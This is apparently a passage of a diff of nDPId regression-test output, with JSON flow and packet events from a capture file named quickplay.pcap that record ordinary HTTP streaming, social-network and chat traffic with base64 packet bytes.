nnznep4SXoywe87c2ocX2ggVFcYGvjslls5jM+9Mb9jAiJUQob+ptDy09gH34DekuerUkd5kD0BHNFL1qJxKuT2KFfpVgoJcv7HmFi278ssvmuhcKYTndrOnym+1tTrX4yHchzxBIO6GaHA8tKeIbQel4TL1v3Z16t\/5xrJ+Q3\/dZxmuZuNaR\/mbOEVBLzpZG7JjcrFSlppStGfqcXspmqu2LVEQvyEoz7nD3cdIKrnhCpQD85sNyvZh8JPCYo865M5+VSfDtodRJdJU1Nl6DW0MAcLqRvHQY9JW8lvPNvqOY2adRWmAKu7tqvblHXcRcfi1rVtS37DAzU+CITvUZ7K30LaIGtCPuD1JyxuUKBexT3QohOr8Lhst8RR1CzAUG3EjerjlJS4KtFHtNg7GoK88LreN47H4SdxDkAmboeyFID9kUTvhDEEqXlfFOEyBf9Hwqltx9X6rJI\/aCSw0l3eGOtTl3BrAC\/PZaQloz6cS6y\/rAG\/nTUo2JYn9FxvYyn46cJ+Dvj0skCnbuZGkNTSODQ8OYRf91rdXgsLkXz7SvGaVdHhOR9kAXFpWZO
7NlKFm7iCcjRGcikx0R+JzsCdgGKw769t40JLLZ2Q7I1fg8xfNUu24vDeA30lrnpOU4r2\/wzGdHdMyj3aW37T\/Pa6QQtQ1KDPtl9xaYHV7eAXl7B\/PrlRzNCxrvA6rIktFl32wWbaV4UONT7uV+4MsIL+HjkWP1O8dgLKVVeYmic1ZUfE8n13QHUcKgu1wZjEhZIqzgLo+waSjiNdfhALL5AB0EpMQXn5\/7OVD3m88BGmhRFUOC2MbYjnNMzH8wAwic5A3Qvz2AIrONrzFcniz\/ItQB42w6KG1uQ+E3nY7gSAkYQOrbzozKOWRZnp2uAnHe4PHe\/OVrr8C50\/kt0TKX5CZ2FJOOqCL0f72chb\/rBb5J0abgAXFRf0RhFz8NBfmLRVAS8iJvF+ExsNR3UUz7Uik5Fcuqlhq\/2+nOX6Vo3ZiRGJ8ebb8KS1vBD76QQNsXfNVIC2g\/pLfmhdq8Adxob5YnXButMrysl7iAokGOqWwh8nWfQCWcnR9MCedQ9mTBrHLXrhSeAVZOjGNYrbH8nHmLOBBy1qB3E4YD0wwrTIH9U0Sgt1"} -01056{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":147,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1429000350578,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":502,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":502,"pkt_l4_len":466,"thread_ts_msec":1429000350578,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAeaaEUAAPwZQjAo2qfp4HCMoyzUAUMz932u3WWBvUBhgH+pmAABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWNTEwUjM2MC9xcG1lenotSGF3a19EaWdpdGFsX0NPTlRBR0lPTl8yMDU0MDMzX0ZFQVRVUkVfRU5HTElTSF8yXzBfTFRSVF8yMzk3NmZwc183ODM0MTkyLm0ydF9TVFY1MTBSMzYwLTAwNjcudHMgSFRUUC8xLjENCkhvc3Q6IHZvZC1zaW5ndGVsaGF3ay5xdWlja3BsYXkuY29tDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgNC40LjQ7IE1JIDNXIEJ1aWxkL0tUVTg0UCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzMzLjAuMC4wIE1vYmlsZSBTYWZhcmkvNTM3LjM2DQoNCg=="} 
-00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":149,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000375190,"flow_last_seen":1429000375190,"flow_idle_time":7440000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":446,"midstream":1,"thread_ts_msec":1429000375190,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52022,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -01056{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":149,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1429000375190,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":502,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":502,"pkt_l4_len":466,"thread_ts_msec":1429000375190,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAeYAQEAAPwbqXQo2qfp4HCMoyzYAUPnxUPbwb7kUUBgByReCAABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWNTEwUjM2MC9xcG1lenotSGF3a19EaWdpdGFsX0NPTlRBR0lPTl8yMDU0MDMzX0ZFQVRVUkVfRU5HTElTSF8yXzBfTFRSVF8yMzk3NmZwc183ODM0MTkyLm0ydF9TVFY1MTBSMzYwLTAwNjgudHMgSFRUUC8xLjENCkhvc3Q6IHZvZC1zaW5ndGVsaGF3ay5xdWlja3BsYXkuY29tDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgNC40LjQ7IE1JIDNXIEJ1aWxkL0tUVTg0UCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzMzLjAuMC4wIE1vYmlsZSBTYWZhcmkvNTM3LjM2DQoNCg=="} 
-01150{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":149,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000375190,"flow_last_seen":1429000375190,"flow_idle_time":7440000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":446,"midstream":1,"thread_ts_msec":1429000375190,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52022,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"vod-singtelhawk.quickplay.com","url":"vod-singtelhawk.quickplay.com\/seg\/vol1\/s\/Warner\/qpmezzhawkdigitalcontagion2054033featureenglish20ltrt23976fps7834192\/2015-02-02\/STV510R360\/qpmezz-Hawk_Digital_CONTAGION_2054033_FEATURE_ENGLISH_2_0_LTRT_23976fps_7834192.m2t_STV510R360-0068.ts","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 3W Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36"}} 
-01244{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":150,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1429000378528,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":632,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":632,"pkt_l4_len":596,"thread_ts_msec":1429000378528,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAmhMQkAArAYwvXgcIygKNqn6AFDLNvB8o6L58VK0UBgIIuBYAAD6gvJK3aB9Wdi2WzDeNoMColML2KCtNfUY2CwzdFLplFssslM2yXsBjnaIJOEoejcQpeFF355YUwtgWhdMMI2rg7t6Y06MNF1+oUMraF1z7dOGYZiWEw55N0R\/C4GUApqp4yWGJ\/CM91mr7EMXR6GJMnCnweJmOE9\/g4efV5ECHsiWKrismHwHX5cBOn2yA4HpOUGRsqAyJSxdx43skOx+vp23ro8\/JrEVnLzlB\/lGV2fdWo3w6VLreno\/QTmqd4pUmkkPPriJdaoBuDGz2cVi7p0befEK6oJ\/9C0fIAdMUQBOBN698TN\/3U5eWrczQSMLB8LJ0s1VPNsG+Uk7iZbLm2h44wxC+hzTD6Om+31wmxRZkWLFty4nGoqINn64kMxZ8jk+gAnxToClxMmrRX+tVkrmxooeDNg8O2BoKHSVu0QB4ZTXmBGAzxtP6AAAUY4sOQns2cIzqTR+SY+i5krcNUfqmctlUK2HS0mekAkRZ9Fb5CIveTsXhz6bTGoR+ZwaRiShSLUWZmInPoFtYMo3SK7u+PM7bDKFUbsQjbVXKacOgHhzN29\/N7\/9u6t2jU0DoTZfnm8RO0mzmGxReSHeGiwBid9gvCA11\/mk5FbSERauRsVxeiUkx2WKBttn3weSeMdFTFGBLzM8bDgXW729KN0+91NW+r+XNzcfLAhYR8kvwcN\/mM+lqT\/pSe\/P8rPDJ\/eOsiJDbHhm2\/4+8udWjPDnsNjkEwnYrvxC7JJAG7cy2LCX7EmJxNJ1SyoFMAc="} 
-01056{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":151,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1429000378725,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":502,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":502,"pkt_l4_len":466,"thread_ts_msec":1429000378725,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAeYCSkAAPwboUwo2qfp4HCMoyzYAUPnxUrTwfKXiUBhgH8mSAABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWNTEwUjM2MC9xcG1lenotSGF3a19EaWdpdGFsX0NPTlRBR0lPTl8yMDU0MDMzX0ZFQVRVUkVfRU5HTElTSF8yXzBfTFRSVF8yMzk3NmZwc183ODM0MTkyLm0ydF9TVFY1MTBSMzYwLTAwNjkudHMgSFRUUC8xLjENCkhvc3Q6IHZvZC1zaW5ndGVsaGF3ay5xdWlja3BsYXkuY29tDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgNC40LjQ7IE1JIDNXIEJ1aWxkL0tUVTg0UCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzMzLjAuMC4wIE1vYmlsZSBTYWZhcmkvNTM3LjM2DQoNCg=="} -00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1429000030398,"flow_last_seen":1429000039635,"flow_idle_time":7440000,"flow_min_l4_payload_len":309,"flow_max_l4_payload_len":1324,"flow_tot_l4_payload_len":3136,"flow_avg_l4_payload_len":784,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.41","src_port":50668,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} 
-00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1429000030766,"flow_last_seen":1429000040059,"flow_idle_time":7440000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":3456,"flow_avg_l4_payload_len":864,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.41","src_port":50669,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1429000041481,"flow_last_seen":1429000041819,"flow_idle_time":7440000,"flow_min_l4_payload_len":181,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":464,"flow_avg_l4_payload_len":232,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"31.13.68.49","src_port":44793,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"}} -00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1429000050062,"flow_last_seen":1429000052145,"flow_idle_time":7440000,"flow_min_l4_payload_len":89,"flow_max_l4_payload_len":540,"flow_tot_l4_payload_len":1169,"flow_avg_l4_payload_len":389,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.151.160","src_port":54883,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
-00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1429000052348,"flow_last_seen":1429000052688,"flow_idle_time":7440000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":529,"flow_avg_l4_payload_len":264,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.129.101","src_port":42761,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1429000054595,"flow_last_seen":1429000054967,"flow_idle_time":7440000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":560,"flow_tot_l4_payload_len":765,"flow_avg_l4_payload_len":382,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.129.101","src_port":42762,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"}} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1429000031075,"flow_last_seen":1429000031382,"flow_idle_time":7440000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":302,"flow_tot_l4_payload_len":355,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.5.18","src_port":33064,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
-00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1429000037600,"flow_last_seen":1429000037659,"flow_idle_time":7440000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":266,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.26.231","src_port":33277,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1429000117728,"flow_last_seen":1429000118045,"flow_idle_time":7440000,"flow_min_l4_payload_len":582,"flow_max_l4_payload_len":775,"flow_tot_l4_payload_len":1357,"flow_avg_l4_payload_len":678,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"54.179.140.65","src_port":56381,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1429000049060,"flow_last_seen":1429000051518,"flow_idle_time":7440000,"flow_min_l4_payload_len":444,"flow_max_l4_payload_len":1096,"flow_tot_l4_payload_len":2511,"flow_avg_l4_payload_len":627,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52007,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
-00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":65,"flow_first_seen":1429000052217,"flow_last_seen":1429000153720,"flow_idle_time":7440000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":42262,"flow_avg_l4_payload_len":650,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52009,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} -00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1429000153937,"flow_last_seen":1429000207676,"flow_idle_time":7440000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":5584,"flow_avg_l4_payload_len":698,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52017,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1429000207973,"flow_last_seen":1429000236577,"flow_idle_time":7440000,"flow_min_l4_payload_len":72,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":4656,"flow_avg_l4_payload_len":665,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52018,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
-00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":25,"flow_first_seen":1429000237766,"flow_last_seen":1429000347404,"flow_idle_time":7440000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":18206,"flow_avg_l4_payload_len":728,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52019,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1429000347103,"flow_last_seen":1429000374116,"flow_idle_time":7440000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":1192,"flow_tot_l4_payload_len":2530,"flow_avg_l4_payload_len":632,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52021,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1429000375190,"flow_last_seen":1429000385363,"flow_idle_time":7440000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":3892,"flow_avg_l4_payload_len":556,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52022,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
-00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1429000031698,"flow_last_seen":1429000032158,"flow_idle_time":7440000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":470,"flow_avg_l4_payload_len":235,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"173.252.74.22","src_port":52285,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"}} -00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1429000037314,"flow_last_seen":1429000037771,"flow_idle_time":7440000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":470,"flow_avg_l4_payload_len":235,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"173.252.74.22","src_port":52288,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"}} 
-00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1429000110390,"flow_last_seen":1429000110528,"flow_idle_time":7440000,"flow_min_l4_payload_len":206,"flow_max_l4_payload_len":625,"flow_tot_l4_payload_len":831,"flow_avg_l4_payload_len":415,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.147.215","src_port":35670,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"}} -00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1429000048159,"flow_last_seen":1429000048795,"flow_idle_time":7440000,"flow_min_l4_payload_len":487,"flow_max_l4_payload_len":1169,"flow_tot_l4_payload_len":2143,"flow_avg_l4_payload_len":714,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.5.41","src_port":44256,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000030398,"flow_last_seen":1429000030398,"flow_idle_time":7560000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1429000030398,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.41","src_port":50668,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
+00873{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1429000030398,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":368,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":368,"pkt_l4_len":332,"thread_ts_msec":1429000030398,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAWBDAUAAPwaoIQo2qfp4HCMpxewAUEHDiNf6xwiBUBgAc22rAABHRVQgL3NvbHIvUmVzdEFwaVNpbmdUZWxfUEgvcmVzdGFwaS9jYXRlZ29yaWVzL0hVRD9hcGlLZXk9cXdlcnR5JmRldmljZT1hbmRyb2lkbW9iaWxlJmxvY2FsZT1lbmcmbmV0d29yaz1XSUZJJnBhZ2VOdW1iZXI9MSZwYWdlU2l6ZT01MCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogRGFsdmlrLzEuNi4wIChMaW51eDsgVTsgQW5kcm9pZCA0LjQuNDsgTUkgM1cgTUlVSS9WNi40LjIuMC5LWERNSUNCKQ0KSG9zdDogYXBpLXNpbmd0ZWxoYXdrLnF1aWNrcGxheS5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KDQo="} +00983{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000030398,"flow_last_seen":1429000030398,"flow_idle_time":7560000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1429000030398,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.41","src_port":50668,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"api-singtelhawk.quickplay.com","url":"api-singtelhawk.quickplay.com\/solr\/RestApiSingTel_PH\/restapi\/categories\/HUD?apiKey=qwerty&device=androidmobile&locale=eng&network=WIFI&pageNumber=1&pageSize=50","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.2.0.KXDMICB)"}} 
+02237{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1429000030498,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1380,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":1380,"pkt_l4_len":1344,"thread_ts_msec":1429000030498,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcBVSmuUAArQbSWHgcIykKNqn6AFDF7PrHCIFBw4oPUBgIIgJuAABIVFRQLzEuMSAyMDAgT0sNClNlcnZlcjogQXBhY2hlLUNveW90ZS8xLjENCkxhc3QtTW9kaWZpZWQ6IFR1ZSwgMTQgQXByIDIwMTUgMDc6MTg6NTQgR01UDQpFVGFnOiAiWW1JNE1EQXdNREF3TURBd01EQXdNRk52YkhJPSINCkNvbnRlbnQtRW5jb2Rpbmc6IGd6aXANClZhcnk6IEFjY2VwdC1FbmNvZGluZw0KQWNjZXNzLUNvbnRyb2wtQWxsb3ctT3JpZ2luOiAqDQpBY2Nlc3MtQ29udHJvbC1BbGxvdy1IZWFkZXJzOiB4LXJlcXVlc3RlZC13aXRoDQpBY2Nlc3MtQ29udHJvbC1BbGxvdy1NZXRob2RzOiBQT1NULCBHRVQsIE9QVElPTlMsIERFTEVURQ0KWC1DbmVjdGlvbjogY2xvc2UNCkNhY2hlLUNvbnRyb2w6IHB1YmxpYywgbWF4LWFnZT0xMzg2DQpFeHBpcmVzOiBUdWUsIDE0IEFwciAyMDE1IDA4OjUwOjE2IEdNVA0KRGF0ZTogVHVlLCAxNCBBcHIgMjAxNSAwODoyNzo